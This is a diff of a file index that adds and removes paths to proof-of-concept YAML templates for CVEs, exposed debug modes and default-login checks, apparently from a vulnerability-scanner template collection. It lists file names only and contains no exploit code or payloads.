@@ -42521,10 +42501,10 @@ ./poc/cve/cve-2021-45380-6582.yaml ./poc/cve/cve-2021-45380-6583.yaml ./poc/cve/cve-2021-45380-6584.yaml +./poc/cve/cve-2021-45428(1).yaml ./poc/cve/cve-2021-45967-6585.yaml ./poc/cve/cve-2021-45967-6586.yaml ./poc/cve/cve-2021-45968-6587.yaml -./poc/cve/cve-2021-45968-6588.yaml ./poc/cve/cve-2021-45968-6589.yaml ./poc/cve/cve-2021-46005-6590.yaml ./poc/cve/cve-2021-46005-6591.yaml @@ -42533,12 +42513,13 @@ ./poc/cve/cve-2021-46379-6594.yaml ./poc/cve/cve-2021-46379-6595.yaml ./poc/cve/cve-2021-46381-6596.yaml -./poc/cve/cve-2021-46381-6597.yaml ./poc/cve/cve-2021-46381-6598.yaml ./poc/cve/cve-2021-46381-6599.yaml ./poc/cve/cve-2021-46387-6600.yaml ./poc/cve/cve-2021-46387-6601.yaml +./poc/cve/cve-2021-46417(1).yaml ./poc/cve/cve-2021-46417-6602.yaml +./poc/cve/cve-2021-46422(1).yaml ./poc/cve/cve-2021-46424(1).yaml ./poc/cve/cve-2022-0140-6603.yaml ./poc/cve/cve-2022-0148-6604.yaml @@ -42550,7 +42531,6 @@ ./poc/cve/cve-2022-0189-6610.yaml ./poc/cve/cve-2022-0189-6611.yaml ./poc/cve/cve-2022-0201(1).yaml -./poc/cve/cve-2022-0208(1).yaml ./poc/cve/cve-2022-0218-6612.yaml ./poc/cve/cve-2022-0218-6613.yaml ./poc/cve/cve-2022-0218-6614.yaml @@ -42576,10 +42556,11 @@ ./poc/cve/cve-2022-0482-6633.yaml ./poc/cve/cve-2022-0482-6634.yaml ./poc/cve/cve-2022-0540(1).yaml -./poc/cve/cve-2022-0543(1).yaml ./poc/cve/cve-2022-0543-6635.yaml ./poc/cve/cve-2022-0591-6636.yaml ./poc/cve/cve-2022-0591-6637.yaml +./poc/cve/cve-2022-0594(1).yaml +./poc/cve/cve-2022-0599(1).yaml ./poc/cve/cve-2022-0653-6638.yaml ./poc/cve/cve-2022-0653-6639.yaml ./poc/cve/cve-2022-0653-6640.yaml 
@@ -42591,37 +42572,32 @@ ./poc/cve/cve-2022-0692-6646.yaml ./poc/cve/cve-2022-0776(1).yaml ./poc/cve/cve-2022-0870(1).yaml -./poc/cve/cve-2022-0968(1).yaml -./poc/cve/cve-2022-1020(1).yaml +./poc/cve/cve-2022-0952(1).yaml ./poc/cve/cve-2022-1040(1).yaml ./poc/cve/cve-2022-1040-6647.yaml ./poc/cve/cve-2022-1054(1).yaml ./poc/cve/cve-2022-1119-6648.yaml -./poc/cve/cve-2022-1221(1).yaml ./poc/cve/cve-2022-1386(1).yaml ./poc/cve/cve-2022-1388-6649.yaml ./poc/cve/cve-2022-1388-6650.yaml ./poc/cve/cve-2022-1388.yaml +./poc/cve/cve-2022-1392(1).yaml ./poc/cve/cve-2022-1392-6651.yaml ./poc/cve/cve-2022-1439(1).yaml -./poc/cve/cve-2022-1597(1).yaml ./poc/cve/cve-2022-1597-6652.yaml ./poc/cve/cve-2022-1598-6653.yaml ./poc/cve/cve-2022-1598-6654.yaml ./poc/cve/cve-2022-1609-6655.yaml -./poc/cve/cve-2022-1713(1).yaml ./poc/cve/cve-2022-1713-6656.yaml -./poc/cve/cve-2022-1815(1).yaml -./poc/cve/cve-2022-1904(1).yaml -./poc/cve/cve-2022-1937(1).yaml +./poc/cve/cve-2022-1906(1).yaml ./poc/cve/cve-2022-21371-6657.yaml ./poc/cve/cve-2022-21371-6658.yaml ./poc/cve/cve-2022-21371-6659.yaml ./poc/cve/cve-2022-21500(1).yaml ./poc/cve/cve-2022-21500-6660.yaml -./poc/cve/cve-2022-21705(1).yaml +./poc/cve/cve-2022-2187(1).yaml ./poc/cve/cve-2022-22536-6661.yaml -./poc/cve/cve-2022-2290(1).yaml +./poc/cve/cve-2022-22536-6662.yaml ./poc/cve/cve-2022-22947-6663.yaml ./poc/cve/cve-2022-22947-6664.yaml ./poc/cve/cve-2022-22947-6665.yaml @@ -42636,6 +42612,7 @@ ./poc/cve/cve-2022-22965-6674.yaml ./poc/cve/cve-2022-22965-6675.yaml ./poc/cve/cve-2022-22965-6676.yaml +./poc/cve/cve-2022-22972(1).yaml ./poc/cve/cve-2022-22972-6677.yaml ./poc/cve/cve-2022-23131-6678.yaml ./poc/cve/cve-2022-23131-6679.yaml 
@@ -42671,12 +42648,10 @@ ./poc/cve/cve-2022-24288-6710.yaml ./poc/cve/cve-2022-24288-6711.yaml ./poc/cve/cve-2022-24288-6712.yaml -./poc/cve/cve-2022-24681(1).yaml ./poc/cve/cve-2022-24856(1).yaml ./poc/cve/cve-2022-24856-6713.yaml -./poc/cve/cve-2022-2487(1).yaml +./poc/cve/cve-2022-2486(1).yaml ./poc/cve/cve-2022-2488(1).yaml -./poc/cve/cve-2022-24899(1).yaml ./poc/cve/cve-2022-24900-6714.yaml ./poc/cve/cve-2022-24990-6715.yaml ./poc/cve/cve-2022-24990-6716.yaml @@ -42687,11 +42662,10 @@ ./poc/cve/cve-2022-25323-6721.yaml ./poc/cve/cve-2022-25323-6722.yaml ./poc/cve/cve-2022-25323-6723.yaml -./poc/cve/cve-2022-25323-6724.yaml ./poc/cve/cve-2022-25369-6725.yaml ./poc/cve/cve-2022-25369-6726.yaml ./poc/cve/cve-2022-25369-6727.yaml -./poc/cve/cve-2022-26134(1).yaml +./poc/cve/cve-2022-26135(1).yaml ./poc/cve/cve-2022-26138(1).yaml ./poc/cve/cve-2022-26138-6728.yaml ./poc/cve/cve-2022-26148-6729.yaml @@ -42702,26 +42676,22 @@ ./poc/cve/cve-2022-26233-6734.yaml ./poc/cve/cve-2022-26233-6735.yaml ./poc/cve/cve-2022-26233-6736.yaml -./poc/cve/cve-2022-26352(1).yaml ./poc/cve/cve-2022-26352-6737.yaml ./poc/cve/cve-2022-26352-6738.yaml -./poc/cve/cve-2022-26564(1).yaml ./poc/cve/cve-2022-26564-6739.yaml +./poc/cve/cve-2022-26960(1).yaml ./poc/cve/cve-2022-27849-6740.yaml ./poc/cve/cve-2022-27849-6741.yaml -./poc/cve/cve-2022-27927(1).yaml +./poc/cve/cve-2022-28079(1).yaml ./poc/cve/cve-2022-28079-6742.yaml -./poc/cve/cve-2022-28080(1).yaml ./poc/cve/cve-2022-28080-6743.yaml ./poc/cve/cve-2022-28219(1).yaml ./poc/cve/cve-2022-28363-6744.yaml ./poc/cve/cve-2022-28363-6745.yaml ./poc/cve/cve-2022-28365-6746.yaml ./poc/cve/cve-2022-28365-6747.yaml -./poc/cve/cve-2022-29014(1).yaml ./poc/cve/cve-2022-29014-6748.yaml ./poc/cve/cve-2022-29298-6749.yaml -./poc/cve/cve-2022-29299(1).yaml ./poc/cve/cve-2022-29303-6750.yaml ./poc/cve/cve-2022-29303-6751.yaml ./poc/cve/cve-2022-29303-6752.yaml 
@@ -42729,37 +42699,41 @@ ./poc/cve/cve-2022-29455(1).yaml ./poc/cve/cve-2022-29455.yaml ./poc/cve/cve-2022-29464-6753.yaml +./poc/cve/cve-2022-29548(1).yaml ./poc/cve/cve-2022-29548-6754.yaml -./poc/cve/cve-2022-30073(1).yaml +./poc/cve/cve-2022-30489(1).yaml ./poc/cve/cve-2022-30525(1).yaml ./poc/cve/cve-2022-30525-6755.yaml -./poc/cve/cve-2022-30776(1).yaml +./poc/cve/cve-2022-30777(1).yaml ./poc/cve/cve-2022-31268(1).yaml ./poc/cve/cve-2022-31268-6756.yaml ./poc/cve/cve-2022-31268-6757.yaml -./poc/cve/cve-2022-32007(1).yaml ./poc/cve/cve-2022-32015(1).yaml ./poc/cve/cve-2022-32018(1).yaml ./poc/cve/cve-2022-32022(1).yaml -./poc/cve/cve-2022-32025(1).yaml ./poc/cve/cve-2022-32026(1).yaml +./poc/cve/cve-2022-32028(1).yaml ./poc/cve/cve-2022-32159(1).yaml ./poc/cve/cve-2022-32159.yaml +./poc/cve/cve-2022-32409(1).yaml ./poc/cve/cve-2022-32409-6758.yaml ./poc/cve/cve-2022-32444-6759.yaml ./poc/cve/cve-2022-32444-6760.yaml +./poc/cve/cve-2022-33119(1).yaml ./poc/cve/cve-2022-33174(1).yaml ./poc/cve/cve-2022-33174-6761.yaml +./poc/cve/cve-2022-34046(1).yaml ./poc/cve/cve-2022-34046-6762.yaml -./poc/cve/cve-2022-34047(1).yaml ./poc/cve/cve-2022-34047-6763.yaml -./poc/cve/cve-2022-35416(1).yaml +./poc/cve/cve-2022-34048(1).yaml +./poc/cve/cve-2022-34049(1).yaml ./poc/cve/cve-2022-36883(1).yaml ./poc/cve/cve-2022-40684(1).yaml ./poc/cve/cve-2022-42889.yaml ./poc/cve/cve-2023-2523.yaml ./poc/cve/cve-2023-33246.yaml ./poc/cve/cve-2023-34039.yaml +./poc/cve/cve-2024-23334.yaml ./poc/cve/cve-annotate.yml ./poc/cve/cve2json.yml ./poc/cve/cve_rce2-1.yaml @@ -42874,7 +42848,7 @@ ./poc/cve/rce-CVE-2021-21224.yaml ./poc/cve/rconfig-cve-2019-16663.yml ./poc/cve/resin-cnnvd-200705-315-9865.yaml -./poc/cve/resin-cnnvd-200705-315-9866.yaml +./poc/cve/resin-cnnvd-200705-315-9867.yaml ./poc/cve/resin-cnnvd-200705-315.yaml ./poc/cve/resin-cnnvd-200705-315.yml ./poc/cve/ruijie-eweb-rce-cnvd-2021-09650.yml 
@@ -42893,6 +42867,7 @@ ./poc/cve/spring-cloud-cve-2020-5410.yml ./poc/cve/spring-cve-2016-4977.yaml ./poc/cve/spring-cve-2016-4977.yml +./poc/cve/springForShell-CVE-2022-22963.yaml ./poc/cve/springForShell-CVE-2022-22965.yaml ./poc/cve/spring_cloud_gateway_CVE_2022_22947.yaml ./poc/cve/spring_cloud_gateway_cve_2022_22947.yaml @@ -42935,29 +42910,29 @@ ./poc/cve/zimbra-cve-2019-9670-xxe.yml ./poc/debug/Django-DebugMode.yaml ./poc/debug/TopApp-AD_enable_tool_debug_php-RCE.yaml +./poc/debug/airflow-debug-231.yaml ./poc/debug/airflow-debug-232.yaml -./poc/debug/airflow-debug-233.yaml ./poc/debug/airflow-debug.yaml ./poc/debug/ampache-debug-page.yaml ./poc/debug/android-debug-database-exposed-312.yaml ./poc/debug/android-debug-database-exposed-313.yaml +./poc/debug/android-debug-database-exposed-314.yaml ./poc/debug/android-debug-database-exposed-315.yaml -./poc/debug/android-debug-database-exposed-316.yaml ./poc/debug/android-debug-database-exposed.yaml ./poc/debug/android-manifest-debuggable-enabled.yaml +./poc/debug/aspx-debug-mode-575.yaml ./poc/debug/aspx-debug-mode-576.yaml ./poc/debug/aspx-debug-mode-577.yaml -./poc/debug/aspx-debug-mode-578.yaml ./poc/debug/aspx-debug-mode-579.yaml ./poc/debug/bitrix-debug-file.yaml +./poc/debug/browserless-debugger-794.yaml ./poc/debug/browserless-debugger-795.yaml -./poc/debug/browserless-debugger.yaml ./poc/debug/checkGoDebug.yaml ./poc/debug/coldfusion-debug-xss-1.yaml ./poc/debug/coldfusion-debug-xss-1152.yaml +./poc/debug/coldfusion-debug-xss-1153.yaml ./poc/debug/coldfusion-debug-xss-1154.yaml ./poc/debug/coldfusion-debug-xss-2.yaml -./poc/debug/coldfusion-debug-xss.yaml ./poc/debug/configure-service-timestamps-debug.yaml ./poc/debug/debug-3c7881aeda959430760389337ec81437.yaml ./poc/debug/debug-assistant-2f45650a91c72711c9ed905e46c42126.yaml 
@@ -42972,7 +42947,8 @@ ./poc/debug/debug-bar-elasticpress-plugin.yaml ./poc/debug/debug-bar-elasticpress.yaml ./poc/debug/debug-bar.yaml -./poc/debug/debug-enabled-6788.yaml +./poc/debug/debug-enabled-6789.yaml +./poc/debug/debug-enabled-6790.yaml ./poc/debug/debug-enabled.yaml ./poc/debug/debug-functions-time-2df258451ffd3064fdb981dedfeff909.yaml ./poc/debug/debug-functions-time-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -43003,6 +42979,7 @@ ./poc/debug/django-debug-detect.yaml ./poc/debug/django-debug-enable.yaml ./poc/debug/django-debug-enabled.yaml +./poc/debug/django-debug-exposed-404.yaml ./poc/debug/django-debug-exposure-7028.yaml ./poc/debug/django-debug-exposure-7029.yaml ./poc/debug/django-debug-exposure-7030.yaml @@ -43032,10 +43009,8 @@ ./poc/debug/lanhaizhuoyue-debug-rce.yaml ./poc/debug/laravel-debug-enabled-8574.yaml ./poc/debug/laravel-debug-enabled-8575.yaml -./poc/debug/laravel-debug-enabled-8576.yaml ./poc/debug/laravel-debug-enabled-8577.yaml ./poc/debug/laravel-debug-enabled-8578.yaml -./poc/debug/laravel-debug-enabled.yaml ./poc/debug/laravel-debug-error-8579.yaml ./poc/debug/laravel-debug-error.yaml ./poc/debug/laravel-debug-info-leak.yaml @@ -43056,7 +43031,7 @@ ./poc/debug/pyramid-debug-toolbar-9741.yaml ./poc/debug/pyramid-debug-toolbar.yaml ./poc/debug/rails-debug-mode-9805.yaml -./poc/debug/rails-debug-mode-9807.yaml +./poc/debug/rails-debug-mode-9806.yaml ./poc/debug/rails-debug-mode.yaml ./poc/debug/sitecore-debug-page-10285.yaml ./poc/debug/sitecore-debug-page.yaml @@ -43067,6 +43042,7 @@ ./poc/debug/symfony-debug.yaml ./poc/debug/symfony-debugmode-10618.yaml ./poc/debug/symfony-debugmode-10619.yaml +./poc/debug/symfony-debugmode-10620.yaml ./poc/debug/symfony-debugmode-10621.yaml ./poc/debug/symfony-debugmode-10623.yaml ./poc/debug/symfony-debugmode.yaml 
@@ -43076,6 +43052,7 @@ ./poc/debug/wamp-xdebug-detect-11101.yaml ./poc/debug/wamp-xdebug-detect-11102.yaml ./poc/debug/wamp-xdebug-detect-11103.yaml +./poc/debug/wamp-xdebug-detect-11104.yaml ./poc/debug/wamp-xdebug-detect.yaml ./poc/debug/wamp-xdebug.yaml ./poc/debug/werkzeug-debug.yaml @@ -43085,7 +43062,7 @@ ./poc/debug/werkzeug-debugger-detect.yaml ./poc/debug/wordpress-debug-log-11256.yaml ./poc/debug/wordpress-debug-log-11257.yaml -./poc/debug/wordpress-debug-log-11258.yaml +./poc/debug/wordpress-debug-log-11259.yaml ./poc/debug/wordpress-debug-log.yaml ./poc/debug/wp-debug-log.yaml ./poc/debug/wp-debugging-0c12452c85fb9700ac837eef51c78541.yaml @@ -43113,18 +43090,18 @@ ./poc/default/JeeSite-default-login.yaml ./poc/default/Kingsoft-default-login.yaml ./poc/default/Konga-default-login.yaml +./poc/default/Mantis-Default_login.yaml ./poc/default/MinIO-default-login.yaml ./poc/default/NagiosXI-CMS-Default-Login.yaml ./poc/default/PFSense-Default-Login.yaml ./poc/default/PRTGNetwork-DefaultLogin.yaml -./poc/default/Redmine-Default-Login.yaml ./poc/default/TestLink-Default-Login.yaml ./poc/default/UniFi-Default-Login.yaml ./poc/default/ZoneMinder-Default-Login.yaml -./poc/default/activemq-default-login-44.yaml ./poc/default/activemq-default-login-45.yaml ./poc/default/activemq-default-login-46.yaml ./poc/default/activemq-default-login-47.yaml +./poc/default/activemq-default-login-48.yaml ./poc/default/activemq-default-password.yaml ./poc/default/activemq-default-password.yml ./poc/default/adobe-aem-default-credentials-1.yaml @@ -43142,8 +43119,8 @@ ./poc/default/aem-default-get-servlet-11.yaml ./poc/default/aem-default-get-servlet-12.yaml ./poc/default/aem-default-get-servlet-13.yaml +./poc/default/aem-default-get-servlet-135.yaml ./poc/default/aem-default-get-servlet-136.yaml -./poc/default/aem-default-get-servlet-137.yaml ./poc/default/aem-default-get-servlet-139.yaml ./poc/default/aem-default-get-servlet-14.yaml ./poc/default/aem-default-get-servlet-15.yaml 
@@ -43197,7 +43174,6 @@ ./poc/default/aem-default-get-servlet-8.yaml ./poc/default/aem-default-get-servlet-9.yaml ./poc/default/aem-default-get-servlet.yaml -./poc/default/aem-default-login-140.yaml ./poc/default/aem-default-login-141.yaml ./poc/default/aem-default-login-142.yaml ./poc/default/airflow-default-credentials.yaml @@ -43208,11 +43184,10 @@ ./poc/default/alibaba-canal-default-password.yml ./poc/default/alphaweb-default-login-276.yaml ./poc/default/alphaweb-default-login-277.yaml -./poc/default/alphaweb-default-login.yaml ./poc/default/ambari-default-credentials-286.yaml ./poc/default/ambari-default-credentials.yaml -./poc/default/ambari-default-login-287.yaml ./poc/default/ambari-default-login-288.yaml +./poc/default/ambari-default-login-289.yaml ./poc/default/ambari-default-login-290.yaml ./poc/default/ambari-default-password.yaml ./poc/default/ampjuke-default-login.yaml @@ -43222,8 +43197,7 @@ ./poc/default/apisix-default-login-491.yaml ./poc/default/apisix-default-login-492.yaml ./poc/default/apollo-default-login-520.yaml -./poc/default/apollo-default-login-521.yaml -./poc/default/arl-default-login-537.yaml +./poc/default/apollo-default-login.yaml ./poc/default/arl-default-login-538.yaml ./poc/default/arl-default-login-539.yaml ./poc/default/arl-default-login-540.yaml @@ -43241,9 +43215,9 @@ ./poc/default/axis2-default-password.yaml ./poc/default/azkaban-default-login-671.yaml ./poc/default/azkaban-default-login-672.yaml -./poc/default/azkaban-default-login-673.yaml ./poc/default/azkaban-default-login-674.yaml ./poc/default/azkaban-default-login-675.yaml +./poc/default/azkaban-default-login.yaml ./poc/default/azkaban-default-password.yaml ./poc/default/azkaban-web-client-default-creds.yaml ./poc/default/azure-default-page.yaml 
@@ -43253,13 +43227,12 @@ ./poc/default/businessintelligence-default-login-816.yaml ./poc/default/businessintelligence-default-login-817.yaml ./poc/default/cambium-networks-default-login.yaml +./poc/default/canal-default-login-846.yaml ./poc/default/canal-default-login-847.yaml ./poc/default/canal-default-login-848.yaml -./poc/default/canal-default-login-849.yaml ./poc/default/canal-default-login.yaml ./poc/default/change-default-login-logo-url-and-title-fef61a56dbdca375b6c1f6da9b2473d7.yaml ./poc/default/change-default-login-logo-url-and-title.yaml -./poc/default/chinaunicom-default-login-906.yaml ./poc/default/chinaunicom-default-login-907.yaml ./poc/default/chinaunicom-default-login-908.yaml ./poc/default/chinaunicom-default-login-909.yaml @@ -43270,13 +43243,13 @@ ./poc/default/ciphertrust-default-password-vulnerability.yaml ./poc/default/circarlife-default-login.yaml ./poc/default/cnzxsoft-information-security-management-system-default-account.yaml -./poc/default/cobbler-default-login-1119.yaml +./poc/default/cobbler-default-login-1118.yaml ./poc/default/cobbler-default-login-1120.yaml ./poc/default/cobbler-default-login-1121.yaml -./poc/default/cobbler-default-login.yaml ./poc/default/control4-default-login.yaml ./poc/default/corero-cms-default-login.yaml ./poc/default/corero-swa-default-login.yaml +./poc/default/crushftp-default-login.yaml ./poc/default/cs141-default-login-1.yaml ./poc/default/cs141-default-login-1277.yaml ./poc/default/cs141-default-login-1279.yaml @@ -43291,7 +43264,6 @@ ./poc/default/default-apache-test-all-6812.yaml ./poc/default/default-apache-test-all-6813.yaml ./poc/default/default-apache-test-all-6814.yaml -./poc/default/default-apache-test-all.yaml ./poc/default/default-apache-test-page-6816.yaml ./poc/default/default-apache-test-page-6817.yaml ./poc/default/default-apache-test-page-6818.yaml 
@@ -43304,13 +43276,11 @@ ./poc/default/default-apache2-ubuntu-page-6809.yaml ./poc/default/default-apache2-ubuntu-page-6810.yaml ./poc/default/default-apache2-ubuntu-page-6811.yaml -./poc/default/default-apache2-ubuntu-page.yaml ./poc/default/default-asp-6823.yaml ./poc/default/default-asp-net-page-6820.yaml ./poc/default/default-asp-net-page-6822.yaml ./poc/default/default-asp-net-page-6824.yaml ./poc/default/default-asp-net-page-6825.yaml -./poc/default/default-asp-net-page.yaml ./poc/default/default-asp.net-page.yaml ./poc/default/default-centos-test-page-6826.yaml ./poc/default/default-centos-test-page-6827.yaml @@ -43319,12 +43289,13 @@ ./poc/default/default-codeigniter-page-6830.yaml ./poc/default/default-codeigniter-page-6831.yaml ./poc/default/default-codeigniter-page-6832.yaml +./poc/default/default-codeigniter-page-6833.yaml ./poc/default/default-codeigniter-page-6834.yaml ./poc/default/default-config-6835.yaml ./poc/default/default-config.yaml ./poc/default/default-detect-generic-6837.yaml -./poc/default/default-detect-generic-6838.yaml ./poc/default/default-detect-generic-6839.yaml +./poc/default/default-detect-generic.yaml ./poc/default/default-django-page-6840.yaml ./poc/default/default-django-page-6841.yaml ./poc/default/default-django-page-6842.yaml 
@@ -43347,14 +43318,15 @@ ./poc/default/default-iis7-page-6859.yaml ./poc/default/default-iis7-page-6860.yaml ./poc/default/default-iis7-page-6861.yaml +./poc/default/default-jetty-page-6862.yaml ./poc/default/default-jetty-page-6863.yaml ./poc/default/default-jetty-page-6864.yaml ./poc/default/default-jetty-page-6865.yaml -./poc/default/default-lighttpd-page-6866.yaml ./poc/default/default-lighttpd-page-6867.yaml ./poc/default/default-lucee-page-6868.yaml ./poc/default/default-lucee-page-6869.yaml ./poc/default/default-lucee-page-6870.yaml +./poc/default/default-lucee-page-6871.yaml ./poc/default/default-lucee-page-6872.yaml ./poc/default/default-mag-42c8a5445d70abc166f93c14f3500712.yaml ./poc/default/default-mag.yaml @@ -43367,6 +43339,7 @@ ./poc/default/default-movable-page-6878.yaml ./poc/default/default-movable-page-6879.yaml ./poc/default/default-nginx-page-6880.yaml +./poc/default/default-nginx-page-6881.yaml ./poc/default/default-nginx-page-6882.yaml ./poc/default/default-nginx-page-6883.yaml ./poc/default/default-openresty-6884.yaml @@ -43374,13 +43347,13 @@ ./poc/default/default-openresty-6886.yaml ./poc/default/default-openresty-6887.yaml ./poc/default/default-openresty-6888.yaml +./poc/default/default-openresty.yaml ./poc/default/default-oracle-application-page-6889.yaml ./poc/default/default-oracle-application-page-6890.yaml ./poc/default/default-oracle-application-page-6891.yaml ./poc/default/default-oracle-application-page-6892.yaml ./poc/default/default-oracle-application-page-6893.yaml ./poc/default/default-oracle-application-page.yaml -./poc/default/default-payara-server-page-6894.yaml ./poc/default/default-payara-server-page-6895.yaml ./poc/default/default-payara-server-page-6896.yaml ./poc/default/default-payara-server-page-6897.yaml 
@@ -43388,8 +43361,6 @@ ./poc/default/default-plesk-page-6899.yaml ./poc/default/default-plesk-page-6900.yaml ./poc/default/default-plesk-page-6901.yaml -./poc/default/default-plesk-page.yaml -./poc/default/default-redhat-test-page-6902.yaml ./poc/default/default-redhat-test-page-6903.yaml ./poc/default/default-redhat-test-page-6904.yaml ./poc/default/default-redhat-test-page-6905.yaml @@ -43407,10 +43378,10 @@ ./poc/default/dell-emc-ecom-default-credentials-6917.yaml ./poc/default/dell-emc-ecom-default-credentials.yaml ./poc/default/dell-idrac-default-login-6942.yaml -./poc/default/dell-idrac-default-login-6943.yaml ./poc/default/dell-idrac-default-login-6944.yaml ./poc/default/dell-idrac-default-login-6945.yaml ./poc/default/dell-idrac-default-login-6946.yaml +./poc/default/dell-idrac-default-login.yaml ./poc/default/dell-idrac9-default-login-6930.yaml ./poc/default/dell-idrac9-default-login-6931.yaml ./poc/default/dell-idrac9-default-login-6932.yaml @@ -43425,6 +43396,7 @@ ./poc/default/dlink-ac-default-password.yaml ./poc/default/dlink-default-password.yaml ./poc/default/dolphinscheduler-default-login-7072.yaml +./poc/default/dolphinscheduler-default-login-7073.yaml ./poc/default/druid-default-login-1.yaml ./poc/default/druid-default-login-2.yaml ./poc/default/druid-default-login-7095.yaml 
@@ -43433,37 +43405,36 @@ ./poc/default/druid-default-login.yaml ./poc/default/druid-default-password-1.yaml ./poc/default/druid-default-password-2.yaml +./poc/default/dubbo-admin-default-login-7120.yaml ./poc/default/dubbo-admin-default-login-7121.yaml -./poc/default/dubbo-admin-default-login.yaml ./poc/default/dubbo-admin-default-password.yaml ./poc/default/dubbo-admin-default-password.yml ./poc/default/dvwa-default-login-7126.yaml -./poc/default/dvwa-default-login-7127.yaml ./poc/default/dvwa-default-login-7128.yaml ./poc/default/dvwa-default-login-7129.yaml +./poc/default/dvwa-default-login.yaml ./poc/default/elasticsearch-insecure-default-config.yaml -./poc/default/emcecom-default-login-7211.yaml ./poc/default/emcecom-default-login-7212.yaml ./poc/default/emcecom-default-login-7213.yaml ./poc/default/emcecom-default-login-7214.yaml ./poc/default/emqx-default-login-7221.yaml +./poc/default/emqx-default-login-7222.yaml ./poc/default/emqx-default-login.yaml ./poc/default/esafenet-cdgserver3-systemconfig-default-password.yaml ./poc/default/exacqvision-default-credentials.yaml ./poc/default/exacqvision-default-login-7274.yaml ./poc/default/exacqvision-default-login-7275.yaml ./poc/default/exacqvision-default-login-7276.yaml -./poc/default/exacqvision-default-login-7277.yaml +./poc/default/exacqvision-default-login.yaml ./poc/default/exacqvision-default-password.yaml ./poc/default/flir-ax8-default-credentials-7512.yaml ./poc/default/flir-ax8-default-credentials.yaml ./poc/default/flir-default-login-7513.yaml -./poc/default/flir-default-login-7514.yaml ./poc/default/flir-default-login-7515.yaml ./poc/default/flir-default-login-7516.yaml +./poc/default/flir-default-login.yaml ./poc/default/frp-default-credentials-7555.yaml ./poc/default/frp-default-credentials.yaml -./poc/default/frp-default-login-7556.yaml ./poc/default/frp-default-login-7557.yaml ./poc/default/frp-default-login-7558.yaml ./poc/default/frp-default-login-7559.yaml 
@@ -43478,6 +43449,7 @@ ./poc/default/glpi-default-login-7731.yaml ./poc/default/glpi-default-login-7732.yaml ./poc/default/glpi-default-login-7733.yaml +./poc/default/glpi-default-login.yaml ./poc/default/gophish-default-login-7792.yaml ./poc/default/gophish-default-login-7793.yaml ./poc/default/gophish-default-login-7794.yaml @@ -43495,14 +43467,15 @@ ./poc/default/grafana-default-password.yml ./poc/default/graphite-browser-default-credential.yaml ./poc/default/guacamole-default-login-7858.yaml +./poc/default/guacamole-default-login-7859.yaml ./poc/default/guacamole-default-login-7860.yaml ./poc/default/guacamole-default-login-7861.yaml ./poc/default/hikvision-intercom-service-default-password.yaml ./poc/default/hikvision-intercom-service-default-password.yml ./poc/default/hongdian-default-login-1.yaml ./poc/default/hongdian-default-login-2.yaml +./poc/default/hongdian-default-login-7997.yaml ./poc/default/hongdian-default-login-7998.yaml -./poc/default/hongdian-default-login-7999.yaml ./poc/default/hongdian-default-password-1.yaml ./poc/default/hongdian-default-password-2.yaml ./poc/default/hortonworks-smartsense-default-credentials.yaml @@ -43511,13 +43484,10 @@ ./poc/default/hp-switch-default-login-8037.yaml ./poc/default/hp-switch-default-login-8038.yaml ./poc/default/huawei-HG532e-default-login.yaml -./poc/default/huawei-HG532e-default-router-login.yaml ./poc/default/huawei-hg532e-default-router-login-8062.yaml ./poc/default/huawei-hg532e-default-router-login-8063.yaml ./poc/default/huawei-hg532e-default-router-login-8064.yaml ./poc/default/hue-default-credential-8080.yaml -./poc/default/hue-default-credential-8081.yaml -./poc/default/hue-default-credential.yaml ./poc/default/ibm-dcbc-default-login.yaml ./poc/default/ibm-dcec-default-login.yaml ./poc/default/ibm-dsc-default-login.yaml 
@@ -43531,36 +43501,35 @@ ./poc/default/ibm-storage-default-password.yaml ./poc/default/idemia-biometrics-default-credentials.yaml ./poc/default/idemia-biometrics-default-login-8138.yaml -./poc/default/idemia-biometrics-default-login-8139.yaml ./poc/default/idemia-biometrics-default-login-8140.yaml -./poc/default/idemia-biometrics-default-login.yaml +./poc/default/idemia-biometrics-default-login-8141.yaml ./poc/default/iis-default-page.yaml ./poc/default/imm-default-login.yaml ./poc/default/inspur-clusterengine-default-login-8162.yaml ./poc/default/iptime-default-login-8192.yaml -./poc/default/iptime-default-login-8193.yaml ./poc/default/iptime-default-login-8194.yaml ./poc/default/jboss-default-password.yaml ./poc/default/jenkins-default-8270.yaml ./poc/default/jenkins-default-8271.yaml +./poc/default/jenkins-default-8272.yaml ./poc/default/jenkins-default-8273.yaml ./poc/default/jenkins-default-login.yaml ./poc/default/jenkins-default-pwd.yaml -./poc/default/jenkins-default.yaml ./poc/default/jinher-oa-c6-default-password.yaml ./poc/default/jinher-oa-c6-default-password.yml ./poc/default/jinher-oa-default-login-8311.yaml +./poc/default/jinher-oa-default-login-8312.yaml ./poc/default/jira-login-default.yaml ./poc/default/jmx-default-login-8354.yaml -./poc/default/jmx-default-login-8355.yaml ./poc/default/jmx-default-login-8356.yaml +./poc/default/jmx-default-login.yaml ./poc/default/jmx-default-password.yaml ./poc/default/jupyterhub-default-login-8399.yaml -./poc/default/jupyterhub-default-login-8400.yaml ./poc/default/jupyterhub-default-login-8401.yaml ./poc/default/kafka-center-default-login-8415.yaml ./poc/default/kafka-center-default-login-8416.yaml ./poc/default/kafka-center-default-login-8417.yaml +./poc/default/kafka-center-default-login.yaml ./poc/default/kafka-center-default-password.yaml ./poc/default/kingsoft-v8-default-password.yaml ./poc/default/kingsoft-v8-default-password.yml 
@@ -43569,9 +43538,9 @@ ./poc/default/lighttpd-default-8628.yaml ./poc/default/lighttpd-default.yaml ./poc/default/lutron-iot-default-login-8674.yaml +./poc/default/lutron-iot-default-login-8675.yaml ./poc/default/lutron-iot-default-login-8676.yaml ./poc/default/lutron-iot-default-login-8677.yaml -./poc/default/lutron-iot-default-login-8678.yaml ./poc/default/lutron-iot-default-login.yaml ./poc/default/mantisbt-default-credential-8778.yaml ./poc/default/mantisbt-default-credential-8779.yaml @@ -43595,15 +43564,15 @@ ./poc/default/nacos-default-password.yaml ./poc/default/nagios-default-credential-8989.yaml ./poc/default/nagios-default-credential.yaml +./poc/default/nagios-default-login-8990.yaml ./poc/default/nagios-default-login-8991.yaml ./poc/default/nagios-default-login-8992.yaml ./poc/default/nagios-default-login-8993.yaml -./poc/default/nagios-default-login-8994.yaml ./poc/default/netentsec-icg-default-password.yaml ./poc/default/netentsec-icg-default-password.yml ./poc/default/netsus-default-login-9058.yaml ./poc/default/netsus-default-login-9059.yaml -./poc/default/netsus-default-login-9060.yaml +./poc/default/netsus-default-login.yaml ./poc/default/nexus-default-login-9086.yaml ./poc/default/nexus-default-login-9087.yaml ./poc/default/nexus-default-login-9088.yaml 
